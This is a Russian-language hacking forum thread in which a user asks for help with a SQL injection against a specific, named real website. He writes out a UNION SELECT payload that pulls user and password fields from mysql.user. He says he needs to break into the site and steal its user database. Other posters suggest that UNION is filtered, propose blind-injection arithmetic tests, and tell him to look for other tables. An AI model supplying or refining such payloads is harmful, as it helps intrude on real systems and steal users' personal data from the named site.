|
маленький ВОПРОС по sql
люди помогите со sql ставлю типа -1+union+select+1,2,user,password,5,6+from+mysql.us er/*
а мне крен на ны а не рут пишет<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <meta http-equiv='Content-Type' content='text/html; charset=windows-1251'> <TITLE>Нет такой партии!</TITLE> </HEAD> <BODY bgcolor=white><CENTER> <H1>Недостаточно параметров</H1></CENTER> </BODY> </HTML> подскажите как рута увести |
мда... тут вроде телепатов нету!! и че ты имеш ввиду под root???? наверное админа получить??
полный урл дай |
union походу фильтруется
|
Цитата:
врятли бы оно писало Цитата:
|
Сама иньекция у тебя что выводит там вообще при постоновки кавычки ошибки выводит??? если blind то попробуй 12 и 13-1 проверка на арифметические операчии которые поддерживает mysql
|
наверна парень хочеть типа такого чтоб было
"<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <meta http-equiv='Content-Type' content='text/html; charset=windows-1251'> <TITLE>Есть такой рут!</TITLE> </HEAD> <BODY bgcolor=white><CENTER> <H1>Нуу полный рууут</H1></CENTER> </BODY> </HTML> " |
Цитата:
|
satana8920 соблазни и уведи рута !)
ну нет у тебя доступа к mysql.user и не парься, ищи др. таблы )) |
да мне любым способом надо ломануть сайт и увести базу данных юзеров вот и парюсь тут а время мало дали вот полная линка вот _http://www.kinnet.ru
может кто чего подскажет |
| Время: 15:26 |